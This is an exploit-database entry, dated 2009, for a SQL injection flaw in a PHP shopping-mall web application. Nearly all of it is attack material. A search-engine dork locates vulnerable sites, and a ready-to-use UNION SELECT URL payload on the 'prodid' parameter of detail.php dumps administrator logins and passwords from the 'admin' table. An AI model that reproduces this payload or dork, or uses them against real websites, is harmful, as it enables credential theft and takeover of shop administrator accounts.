exploit-db-mirror/exploits/php/webapps/13987.txt

#######################################################################
#
# Source: Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability
# Download: http://preproject.com/products.asp
# Dork: inurl:Powered by: PreProjects + detail.php?prodid=694
# Author: Sangteamtham@gmail.com
#
#######################################################################

Exploit :

http://server/detail.php?prodid=999999+UNION SELECT
1,2,3,group_concat(login,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
from admin

Discovered since Wed, Jul 15, 2009